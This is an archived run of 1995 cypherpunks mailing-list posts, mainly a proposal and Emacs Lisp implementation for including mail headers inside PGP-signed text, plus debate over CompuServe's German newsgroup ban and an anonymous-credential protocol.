From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 31 Dec 1995 00:49:17 +0800
To: cypherpunks@toad.com
Subject: Re: easy avoidance of PGP signature forgeries and reuse
In-Reply-To: <Pine.BSD.3.91.951229172352.26978C-100000@usr5.primenet.com>
Message-ID: <y9HXgD18w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


attila <attila@primenet.com> writes:
> 	I never paid much attention to the problem other than to avoid
>     it by forcing it --i.e. list the destination and the send inside the
>     signature block, thus:
>
>     ----------------- BEGIN PGP SIGNED TEXT
>
>     To: john doe <john@box.com>
>     Newsgroups: sci.crypt
>     From: jane roe <jane@topsey.turvey.com>
>     Subject: that's all folks!
...


Good - that's just what I've proposed :). However right now the overwhelming
majority of people who PGP-sign their writings, don't include a copy of the
headers within the signed portion.

Those few who do, all seem to use different formats, so the signed headers
cannot be easily compared to the headers in the actual envelope by a program.

I propose a format below.

> 	with e-mail, e-letters, direct faxes, etc. it is to easy to
>     ignore the courtesy header. From a standpoint of security, you have
>     blown away each of the attacks outline in your article in so much as
>     the signature will not compute if the courtesy block is omitted.

I totally agree; that's why I propose copying that info in the signed portion
"by default".

> 	personally, I do not think PGP 3 should attempt to solve the
>     problem. Most of the headers involved are applied _after_ the message
>     leaves the mail program; and, PGP interfaces are virtually the same
>     as invoking an alternate editor, which gets you nothing.

I don't think that a protocol for signing headers that requires mime/multipart
is going to be widely used, especially for Usenet postings. I've thought about
it and came up with the following idea for the syntax:

----BEGIN PGP SIGNED MESSAGE----

some text

----BEGIN PGP SIGNED HEADERS----

From: address                          [all these are optional]
To: address[,address]...
Newsgroups: group[,group]...
Date: rfc 822 date
Subject: subject

----BEGIN PGP SIGNATURE----
Version 2.6.2

12341234...

----END PGP SIGNATURE----

The "signed headers" portion may contain the following optional fields:

From: address -- the address associated with the key used to sign this message

To: address[,address]... -- addresses (user@host, no names) of the recipients
in RFC 822 To: and Cc: headers (not the Bcc: recipients). Addresses mangled
by various gateways shouldn't verify.

Newsgroups: group[,group]... -- the newsgroups from the RFC 1036 header

Date: and Subject: -- should match the header

The sequence of events would be:
* pick the addressees and the newsgroups + compose the text
* sign the signed portion
* post/e-mail the result to the specified addressees/newsgroups.

(Of course, the poster could lie and claim in the signed portion that the
article is being posted to alt.sex.pedo when he himself posts it to misc.kids:)

If a standard like this catches on, and is integrated into PGP-aware
news/e-mail programs, then it's a simple exercise to write a little script to
look for BEGIN PGP SIGNED HEADERS and compare the information inside it with
the RFC 822/1036 headers outside the signed portion of the message. It could
be done within PGP too.


---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 31 Dec 1995 08:32:13 +0800
To: cypherpunks@toad.com
Subject: Re: Compuserve is Not "Censoring": Look to Governments for the Cause
Message-ID: <ad0ab5bb2b021004cfc2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:17 AM 12/30/95, Ulf Moeller wrote:

> From the comment by Niklaus Haubltzel:
>
>"Reality cannot be outlawed, only improved, and many still hope that
>complete freedom of information and opinion in computer networks can
>contribute to that. But the company of CompuServe does not seem to
>be interested in that. They only want their customers' money, but
>not their freedom. [...] Like any censorhip, this one comes with
>hipocrisy. Towards their paying customers, CompuServe claims to have
>been forced by German prosecutors. Thus one lie creates another.
>That they were forced it out of the question. It is only in
>dictatorships that the prosecutors judge the defendants - that is why
>dictatorships need censors."

Well said by this person! (Except for the point about Compuserve's
"greed"...greed is good.)

I am hopeful that Germany can move away from this censorious position
(whether they prosecuted CS or not, there was clearly the threat of
prosecution, and CS caved into it).

As with the Cornell case, where students "volunteered" to perform
"community service" and thus Cornell did not otherwise discipline them for
their speech (the "75 Reasons" joke they sent to their friends), the mere
possibility of punishment/sanction is usually sufficient. This is called
"the chilling effect" in free speech discussions.

Longterm, the solution still lies with moving toward smaller units directly
accessing the Net, thus making threats harder to effectively mount.

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sun, 31 Dec 1995 01:00:20 +0800
To: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Subject: Re: Zensoren ueber Alles
Message-ID: <199512301554.KAA25650@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Dec 30, 1995 00:04:01, '"Ed Carp [khijol SysAdmin]"
<erc@dal1820.computek.net>' wrote: 
 
 
> 
>This "Tall Paul" fellow said: "Based on other news reports, I conclude
that CompuServe lied in both areas." 
> 
>So?  Companies lie all the time - the bigger the company, the bigger the  
>lie, in my experience.  Companies are like governments - they will get  
>away with what they can until caught.  Even then, they rarely stop - it  
>just goes undercover. 
> 
 
I was not presenting a political analysis behind CompuServe's actions, nor
writing a simple personal opinion. I was presenting what I considered an
factually correct objective observation of their actions.   
 
>> It did none of these things. It cut off all customers to an enormous
number 
>> of groups. It inferrentially violated property rights (i.e. contracts)
to 
>> customers promised internet access and now provided only a crippled
version 
>> thereof. And it lied about the whole thing.  
> 
>Again, so?  All that it will do is to drive people away from Compu$erve  
>into the arms of other service providers.  Maybe some of them will even  
>figure out what a *real* ISP is... 
> 
 
How accurate is Carp's conclusion. Not very, in my opinion. The inaccuracy
develops from the excessively narrow economic focus of Carp's thinking. It
is an analysis that ignores the *social* implications of the CompuServe
decision, treating the entire matter almost as something that would only
interest CompuServe, Microsoft, AOL, and Prodigy stockholders. 
 
Among the other effects *already* visible, the decision has: 
 
1) Led to an enormous amount of anti-net publicity by incompetent editors
on the national news; 
 
2) Furthered the development of hysteria and hysterical organizing; ("I
don't care if it is censorship," said one mommy interviewed on the national
news. "It is good for my children.") 
 
3) Furthered the developmet of the right-wing "family rights" crowd; ("We
need to follow Germany's lead," said one official from one of the "family
rights" crowd interviewed on the national news.) 
 
4) Promoted more dishonesty as a perfectly reasonable and perfectly
acceptable means of engaging in social discourse; 
 
I predict it will also be used for additional attacks on issues of
encryption, privacy,  and anonymity. That is, I think we will see
statements like "We need to be especially vigilant to make sure that the
perverts are not smuggling banned material into the country via the
internet. This means we have to block encryption, monitor user accounts
even more carefully for potential perverts, etc. etc. 
 
Finally, I am not sure that Carp's economic analysis of the CompuServe
decision is correct. The large internet service providers (LISP) form an
oligopoly and, I think, the LISP all abandon hopes that they can become a
monopoly. One form of oligopolistic co-operation is the creation of market
niches within acceptable bounds of market share for each of the
oligopolistic corporations. That is, CompuServe just launched a huge
organizing effort to grab the "family" niche within the LISP market. I do
not have the facts needed for a detailed quantfiable analysis of the LISP
oligopoly (and frankly would not want to devote the time to such an
analysis even if I did.) So I'll conclude here by stating that CompuServe's
market share may increase because of their decision as parents move from
the "family hostile" MSN/AOL/etc. to the "family friendly" CompuServe. 
 
If sexual hysteria is much stronger than views against censorship, for
freedom of speech and inquiry, then we may see the other LISP groups
emulate CompuServe to protect their oligopolistic market share. That is, if
*significant* portions of AOL/MSN/etc. customers are motivated by sexual
hysteria and start moving their accounts to CompuServe we will see
AOL.MSN/etc. become equally "family friendly" to stop the customer shifts. 
 
     --tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 31 Dec 1995 01:23:13 +0800
To: cypherpunks@toad.com
Subject: Re: Chinese Cypherpunk quote  [NOISE]
In-Reply-To: <199512300011.QAA16526@urchin.netscape.com>
Message-ID: <ZuJXgD22w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Corey Bridges <corey@netscape.com> writes:
> To reply simply: Wrong -- the will of the people is as fickle as the wind.
> Follow the will of the people, and you run your country by following fads.
> Mob rule and all that. We're in deep trouble if we ever get a true democracy.

One of the things Adolph Hitler and Bill Clinton have in common is that
both were democratically elected leaders.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 31 Dec 1995 02:24:17 +0800
To: cypherpunks@toad.com
Subject: Positive Implications of the Compuserve Moves
Message-ID: <ad0ab8672c0210047052@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:54 PM 12/30/95, tallpaul wrote:

>Among the other effects *already* visible, the decision has:
>
>1) Led to an enormous amount of anti-net publicity by incompetent editors
>on the national news;

On the positive side, I've heard some commentators (mainly on CNBC, and
all-business news channel) ask pointed questions, and note that if every
country imposes its own standards on the Internet/Usenet, then the
implications are dire.

The strong reaction developing against Compuserve could rebound to the
benefit of killing off the Exon/Hyde language, in the best of all
situations. (The Telecom Bill is still being thrashed out, and the CS
controversy may remind folks of the implications of their actions.)

>4) Promoted more dishonesty as a perfectly reasonable and perfectly
>acceptable means of engaging in social discourse;

I predict Compuserve will lose so much of what little respect they have
eked out amongst Internet users that they will be eventually forced to
provide the 200 dropped newsgroups, issue an apology, and probably retire
or reassign a few executives as a show of public remorse. You heard it hear
first.

And many users are seeing the problems with monolithic, primitive ISPs like
Compuserve, AOL, Prodigy, etc., and are moving to get "real" Net
connections. This is a Good Thing.

>Finally, I am not sure that Carp's economic analysis of the CompuServe
>decision is correct. The large internet service providers (LISP) form an
>oligopoly and, I think, the LISP all abandon hopes that they can become a

LISP?

(define CompuserveSucks (lambda () (display ".") (CompuserveSucks)))
(CompuserveSucks)


Recurses, foiled again!

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sat, 30 Dec 1995 09:59:17 +0800
To: lstewart@prisminc.com (lstewart)
Subject: Re: Housewarming/birthday party
In-Reply-To: <9502157953.AA795307204@prisminc.prisminc.com>
Message-ID: <199512300046.LAA16884@suburbia.net>
MIME-Version: 1.0
Content-Type: text


>      The price of condo living: There is no guest parking in the complex, 
>      and the party must end by 10pm.  Please help us get along with our new 
               ^^^^^             ^^^^
>      neighbors by respecting the condo rules.  Thanks!
> 

Thats not a party. Thats an after-school tupperware get-together.

Cheers,

-- 
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  has stood still, who built the largest |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 31 Dec 1995 04:27:34 +0800
To: Dave Del Torto <ddt@lsd.com>
Subject: Re: last straw
Message-ID: <m0tW7Fu-0008zAC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:34 AM 12/30/95 -0800, you wrote:
>I've decided to cancel my CrampuNerve account and send the weasels a msg to
>telling them why. I encourage everyone here to do the same with your CI$
>account (if you still have one). These [insert colorful expletive here]s
>only understand one thing: cold ca$h. Thus, the only effective way to send
>them an indication of one's displeasure at their poor precedent-setting is
>to vote with one's wallet.
>
>Any who are still unfortunate enough to rely on CI$ for Internet/Usenet
>access are getting reamed price-wise anyway, not to mention suffering poor
>reliability and now access, so maybe a few of them could also take this
>opportunity to migrate to an ISP with some real "backbone."

I don't have a CSERVE account, and never have.  But yesterday, I called a
friend (who has such an account) I talk to every two weeks or so.  The
conversation went something like this:

"Hi Greg."
"Hi Jim."
"I suggest that you get rid of your Comp..."   (he cuts me off in
mid-sentence, anticipating the entire subject of the call)
"I'm doing that as we speak, Jim"
"...because they just..."  (I continued the thought, but he cut me off again)
"That's EXACTLY why I'm doing it, Jim."
(mutual laughter as we realize the irony of the situation.)


Somehow, I think Compuserve is going to get the message.

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 31 Dec 1995 01:32:47 +0800
To: Ulf_Moeller@public.uni-hamburg.de
Subject: Re: Compuserve is Not "Censoring": Look to Governments for the Cause
In-Reply-To: <m0tVzI0-00007hC@ulf.mali.sub.org>
Message-ID: <199512301700.MAA08304@homeport.org>
MIME-Version: 1.0
Content-Type: text


	This trend towords governments saying 'This might be illegal,
we won't tell you' is very disturbing.  Doug Barnes reported on it
being the tactic of choice in forcing banks to fall in line & spy on
their customers.

	Compuserve should be encouraged to get a ruling from the
Barvarian/German government on the legality of the groups.  (Does the
EU provide freedom of speech protections, or simply freedom of
inoffensive speech?)  Also, how does this interact with the
harmonization of publications laws with places such as the
Netherlands?  The EU can't be expected to thrive if each country has
totally different publishing laws.

	Alternately, if there are cypherpunks who spend time in
alt.config, we might create groups such as alt.intimate.stories,
alt.intimate.bondage.duct-tape, etc.


Ulf Moeller wrote:

| This is today's page 1 article in the newspaper "die tageszeitung".
| 
| The article "Zensur im Cyberspace" (censorship in cyberspace)
| and the comment "Die Moral der Biederm=E4nner" are available
| http://www.prz.tu-berlin.de/~taz until tomorrow.
| 
|  From the article (my translation):
| 
| "The Bavarian department of public prosecution 'has left it to their
| discretion' to take the 'necessary steps' on their own, to avoid
| 'possible punishability of the management in Germany'. An advice that
| CompuServe has followed although there is no kind of legal obligation
| for it. Legally, it is still perfectly unclear if enterprises that
| provide access to the Internet can be held responsible in any way for
| the contents distributed there."



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ulf_Moeller@public.uni-hamburg.de (Ulf Moeller)
Date: Sat, 30 Dec 1995 19:50:09 +0800
To: cypherpunks@toad.com
Subject: Re: Compuserve is Not "Censoring": Look to Governments for the Cause
Message-ID: <m0tVzI0-00007hC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


>Thus, it is the government of Germany in this case which is "censoring."

This is today's page 1 article in the newspaper "die tageszeitung".

The article "Zensur im Cyberspace" (censorship in cyberspace)
and the comment "Die Moral der Biedermnner" are available
http://www.prz.tu-berlin.de/~taz until tomorrow.

 From the article (my translation):

"The Bavarian department of public prosecution 'has left it to their
discretion' to take the 'necessary steps' on their own, to avoid
'possible punishability of the management in Germany'. An advice that
CompuServe has followed although there is no kind of legal obligation
for it. Legally, it is still perfectly unclear if enterprises that
provide access to the Internet can be held responsible in any way for
the contents distributed there."

 From the comment by Niklaus Haubltzel:

"Reality cannot be outlawed, only improved, and many still hope that
complete freedom of information and opinion in computer networks can
contribute to that. But the company of CompuServe does not seem to
be interested in that. They only want their customers' money, but
not their freedom. [...] Like any censorhip, this one comes with
hipocrisy. Towards their paying customers, CompuServe claims to have
been forced by German prosecutors. Thus one lie creates another.
That they were forced it out of the question. It is only in
dictatorships that the prosecutors judge the defendants - that is why
dictatorships need censors."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dietrich J. Kappe" <goedel@cerebus.redweb.com>
Date: Sun, 31 Dec 1995 03:37:57 +0800
To: cypherpunks@toad.com
Subject: Re: Massey, CEO of Compuserve, on Internet
In-Reply-To: <Pine.SUN.3.91.951229220043.25326A-100000@unix5.netaxs.com>
Message-ID: <199512301926.NAA29572@cerebus.redweb.com>
MIME-Version: 1.0
Content-Type: text/plain


>   Munich prosecutor Manfred Wick confirmed Friday that Bavarian state
    ^^^^^^                                               ^^^^^^^^
>police investigators searched CompuServe's networks and computers last
>month for child pornography, but he would not say what they found.
>   "We didn't threaten them with charges," Wick said.

Its worth mentioning that the state of Bavaria (Bayern) is the most
conservative and one of the most Catholic provinces in Germany. There
was an article in Zeit a few months ago about a division of the police
investigating on-line crime, although at the time it was more BBS and
Video Text related. As a former resident of Bavaria, I am not one bit
surprised at these scare tactics.

-- 
Dietrich Kappe | Red Planet    http://www.redweb.com
Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 31 Dec 1995 03:09:25 +0800
To: cypherpunks@toad.com
Subject: PLA_gue  Germ Terrorism
Message-ID: <199512301830.NAA05708@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-30-95. To update the list of terrorist threats, the Wash
   Post reports on the purchase in May of bubonic plague germs 
   by "white supremacist" Larry Wayne Harris, his bust by the 
   FBI and germ teams, prosecutors amazement that possession 
   of such deadly micro-organisms is not illegal, and the 
   consequent plea bargain of wire fraud with probation.

   The article explains that possession of "terrorist" mites
   is not prohibited due to a legal loophole which allows
   scientific trade in wee supremacists. There are calls for 
   outlawing the meat-eaters by closing the gap in the 
   anti-terrorism bill before Congress. But scientists say 
   how dare you spit in our nanodeath soup.

   It notes that offshore spread is Commerce regulated.

   BTW, why this story now about summer events? For the
   anti-terrorist bill, TLA-plague growth, any germ any?


   PLA_gue












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Sun, 31 Dec 1995 03:18:16 +0800
To: cypherpunks@toad.com
Subject: Re: Massey, CEO of Compuserve, on Internet
Message-ID: <199512301850.NAA17165@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Peter D. Junger wrote:
> 
> One should also notice that Bavaria is only one state in the German
> Federal Republic; this case is more like Texas investigating
> Compuserve than the United States federal government investigating
> Compuserve.  Bavaria is the stronghold of what can properly be called
> the (Catholic) Religious Right in Germany.  It should also be noticed
> that in general German publications and television seem to be less
> constrained in publishing materials that in the United States would be
> called ``indecent'' by some than are United States publications and
> broadcasters.
> 

In some areas they may be a tad more liberal, but in general they
are not.  They do indeed have laws preventing freedom of speech
(especially with regard to right wing politics, the holocaust etc.)
Somebody correct me if I'm wrong, but I believe that all German ISPs
do not carry various political/controversial newsgroups such as alt.revisionism due to legal reasons.

A more serious problem for those of us in EU countries is that the German government have influence on other EU states - only a week or
two ago they tried to push through European wide legislation
restricting freedom of speech.


Gary
- --
"If there be time to expose through discussion the falsehood and
fallacies, to avert the evil by the processes of education,
the remedy to be applied is more speech, not enforced silence."
	-- US Supreme Court Justive Louis Brandeis
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMOWKESoZzwIn1bdtAQEBQwGA1jg9rwAJgB/PlkzItUp4JOjScswcqxR5
hqSJK/rj2o6cNN7Z9OGVD8+9VMJi7BEp
=XTJn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sun, 31 Dec 1995 04:33:56 +0800
To: cypherpunks@toad.com
Subject: Re: blind validation
In-Reply-To: <199512300908.EAA07360@opine.cs.umass.edu>
Message-ID: <199512302007.OAA00861@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> I'm not convinced that your last point is true. It appears that the signed
> Bobnet-access-number is still just a transferrable ticket. Charlie can
> place an order with Bob, forward the Bobnet-access-number to Alice, wait for
> Alice & Trent to do the blinding & signing tango, forward the signed Bobnet-
> access-number to Bob, and get the goods from Bob.
>   
> Charlie can't use the signed Bobnet-access-number to prove to Trent
> that he's Alice. In fact, since it's unblinded, Charlie can't even prove
> that he's linked to a particular validation performed by Trent. (If Alice
> foolishly gave him the blinded version too, he could show that he shares
> Alice's knowledge about this validation.) 


> I'm not convinced that your last point is true. It appears that the signed
> Bobnet-access-number is still just a transferrable ticket. Charlie can
> place an order with Bob, forward the Bobnet-access-number to Alice, wait for
> Alice & Trent to do the blinding & signing tango, forward the signed Bobnet-
> access-number to Bob, and get the goods from Bob.

Yes and no.  It is just a ticket, except that there are time 
constraints.  If Alice doesn't respond in some reasonable time while the 
protocol is going on, Bob quits.  (I didn't say that explicitly, my 
mistake.)

Part of what I was trying to say, but didn't say well, is that Alice can 
*always* act as a proxy, ie., she can always get a file and give it to 
someone else.  But Sam can't bust Bob if Alice gives the file away.  
He'll have to go after Alice.

The whole point of the exercise is to convince Sam that Bob hasn't given
away any files to minors or Europeans or whoever else Sam feels shouldn't
have them. 

This puts a whole new spin on the situation, a different sort of attitude 
than we usually have when we're talking about crypto protocols.  The 
entire ecash system has to have integrity.  If someone figures out how to 
forge or double spend ecash, it doesn't do the bank any good to say, "We 
didn't do it, this person with an account did it."

But we can't keep erotica out of the hands of minors, or home grown 
crypto out of the hands of Europeans.  That means that from a certain 
point of the view, the system as a whole won't have integrity.  But no 
system can have integrity, because Alice can always act as a proxy.

The point is to set things up so that:

1.	Alice can remain anonymous
2.	Bob can keep Sam off his back
3.	Sam has to admit that the system, imperfect as it is, is as good
	as other systems.  (Alice can act as a proxy, but she could do 
	that at a liquor store or a pornography shop also.  If Alice had
	to give her ID, she could still give away the file.)

The through the looking glass aspect of this is that from a practical
standpoint, there's no real difference between Alice giving away her
credentials and Alice acting as a proxy.  But Sam foists the upon us the
necessity of arguing what are almost semantic points.  If Bob always gives
the files to people Sam says are ok, then Bob won't go to jail.

It is true that Alice could act as a beard for someone in the transaction,
but in my opinion it's not unreasonable to claim that if she does she's
acting as a proxy.  The attacker still has to go to Alice and say, "give
me this file", and Alice still has to agree and interact with Trent in the
moment to make it work.  Going back to the liquor store analogy, Alice 
can go into the liquor store with a kid, have the kid point to a bottle 
on the shelf, go to the register, and then buy it.

But she can't give her ID away to the kid and let the kid go to the liquor
store on his own.  Either way the kid gets drunk, but if Alice can't give
away her ID, Bob won't have to worry about losing his license. 

Alice, of course, has to watch out for Sam.

> 3. is OK as long as Alice trusts Trent. The trick is selecting a Trent
> trusted by both Alice and Sam ;)

Very true.

> 
> -Futplex	<futplex@pseudonym.com>
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steve@miranova.com (Steven L. Baur)
Date: Sun, 31 Dec 1995 08:40:24 +0800
To: cypherpunks@toad.com
Subject: Re: easy avoidance of PGP signature forgeries and reuse
In-Reply-To: <y9HXgD18w165w@bwalk.dm.com>
Message-ID: <m2n38am8ht.fsf@diana.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[sample implementation for Gnus is included]
>>>>> "Dimitri" == Dimitri Vulis <dlv@bwalk.dm.com> writes:

    Dimitri> I propose a format below.

See the PGP header block attached to this message as an example of
this proposed format.

    atilla> with e-mail, e-letters, direct faxes, etc. it is to easy
    atilla> to ignore the courtesy header. From a standpoint of
    atilla> security, you have blown away each of the attacks outline
    atilla> in your article in so much as the signature will not
    atilla> compute if the courtesy block is omitted.

    Dimitri> I totally agree; that's why I propose copying that info
    Dimitri> in the signed portion "by default".

    atilla> personally, I do not think PGP 3 should attempt to solve
    atilla> the problem. Most of the headers involved are applied
    atilla> _after_ the message leaves the mail program; and, PGP
    atilla> interfaces are virtually the same as invoking an alternate
    atilla> editor, which gets you nothing.

I agree.  Besides, this whole thing can be done with the existing PGP.
Date: and Message-ID: are two, and they need to be signed.  Date: is a
further problem with Gnus, since the format of the displayed date is
user customizable, but that's a separate issue.

    ...

    Dimitri> The "signed headers" portion may contain the following
    Dimitri> optional fields:

    Dimitri> From: address -- the address associated with the key used
    Dimitri> to sign this message

It's easier to deal with whatever is being used as the From: in the
message.

    ...

    Dimitri> (Of course, the poster could lie and claim in the signed
    Dimitri> portion that the article is being posted to alt.sex.pedo
    Dimitri> when he himself posts it to misc.kids:)

So you would also include the Message-ID:.

    Dimitri> If a standard like this catches on, and is integrated
    Dimitri> into PGP-aware news/e-mail programs, then it's a simple
    Dimitri> exercise to write a little script to look for BEGIN PGP
    Dimitri> SIGNED HEADERS and compare the information inside it with
    Dimitri> the RFC 822/1036 headers outside the signed portion of
    Dimitri> the message. It could be done within PGP too.

This is basically a Good Idea, and can be implemented using existing
tools.

Here is some to code to implement it for Gnus.  Verification of the
headers is left (at present) as an exercise for the reader.

;;; Add this to your .gnus and call
;;; gnus-article-sign-message instead of mc-sign directly.
;;; Pgp signed messages are vulnerable to various kinds of badness due to
;;; the separation of header information.  Fix it.

(defconst gnus-pgp-included-headers '("From"
				      "To"
				      "Newsgroups"
				      "Message-ID"
				      "Date"
				      "Subject"
				      "Cc"
				      "Gcc")
  "Headers to include in signed portion of PGP signed message.")

(defconst gnus-pgp-signed-headers "----BEGIN PGP SIGNED HEADERS----\n"
  "String to use for separation in message.")

(defun gnus-article-sign-message (arg)
  "Sign a message with PGP, including outgoing headers in an included
block, as per the suggestion of \"Dr. Dimitri Vulis\" <dlv@bwalk.dm.com>."
  (interactive "p")
  (save-excursion
    (save-restriction
      (gnus-inews-narrow-to-headers)
      (goto-char (point-max))

      (or (mail-fetch-field "date")
	  (insert (concat "Date: " (gnus-inews-date) "\n")))
      (or (mail-fetch-field "message-id")
	  (insert (concat "Message-ID: " (gnus-inews-message-id) "\n")))))

  (save-excursion
    (goto-char (point-max))
    (insert "\n")
    ;; If there is already a header block (eg. after undoing a signature)
    ;; remove it entirely, and rebuild from scratch.
    (if (re-search-backward gnus-pgp-signed-headers nil t)
	  (kill-region (point) (point-max)))
    (insert gnus-pgp-signed-headers)
    (let ((headers gnus-pgp-included-headers)
	  header header-value)
      (while (setq header (car headers))
	(setq headers (cdr headers))
	(save-excursion
	  (save-restriction
	  (gnus-narrow-to-headers)
	  (setq header-value (mail-fetch-field header))))
	(if header-value
	    (insert (concat header ": " header-value "\n"))))
      (insert "\n")))
  (mc-sign arg))

- -- 
steve@miranova.com baur

- ----BEGIN PGP SIGNED HEADERS----
To: cypherpunks@toad.com
Message-ID: <m2n38am8ht.fsf@diana.miranova.com>
Date: 30 Dec 1995 15:34:22 -0800
Subject: Re: easy avoidance of PGP signature forgeries and reuse


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMOXMhKLJZEUiepcNAQGjtgP/ZnC+TL4cbFL3RF+o8fwe2YFciqGkOWX9
VuPK4btnvfKF/wcdMTfJoUKbSutKcwRkbLe5fAqEV3qrXwM7PgfNMlXfcgNg44It
UhfLAaFg6ke5ArWr9EZfyFcD93OrS9qVGU7emSenmsqpdJUE6jU0HmKAQkZzP1Ak
AYQD7ow/tzI=
=PTV7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 31 Dec 1995 08:41:41 +0800
To: cypherpunks@toad.com
Subject: new years resolutions for cypherpunks
In-Reply-To: <199512302133.QAA00352@localhost.cjs.net>
Message-ID: <Pine.SOL.3.91.951230152654.292A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


Another year, another flamewar :-)
Anyone else prepared to sign something similar?


Simon

-----BEGIN PGP SIGNED MESSAGE-----

In 1996 I resolve to 
	
	1) Avoid ad-hominem attacks even on complete idiots
	2) Not post non-crypto libertarian or consipracy items to 
	   cypherpunks.
	3) Contribute to, Implement and use open cryptographic standards
	   rather than  proprietary ones.
	4) Have most of my regular internet hosts running IPSEC before 1997.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AwUBMOXNiQkKftKguxLhAQEDsAL/ZoWeONP+R2pJrA9O9RuIu+Juljt04OIB
pFYxH+DfktzDoX0dhfDkrP0TdjMiXnPI7Z5zkidF4O2oUJ0Myzv1F9VSgFXiyU7X
BHUxnazXmhj7crbt86YIwchxqgLGVVNw
=Bwyh
-----END PGP SIGNATURE-----

(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 
	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Sun, 31 Dec 1995 06:58:29 +0800
To: fc@all.net (Fred Cohen)
Subject: Re: Is Dr Fred Cohen a Loon???
In-Reply-To: <9512302200.AA14470@all.net>
Message-ID: <199512302211.QAA14605@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> 
> > The Subject says it all... I believe Fred suffers from a severely inflated
> > ego and suffers from the "false expert" syndrome detailed by various
> > self-help orgs... what say you fred??
> 
> People who call me a "false expert" are so afraid of damaging their own
> reputation by doing so that they have to do it anonymously. 

OK, I'll do it.  Fred, sometimes your pontifications make as little sense 
as you arrogantly signing "Dr. Fred Cohen" in your name field.
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

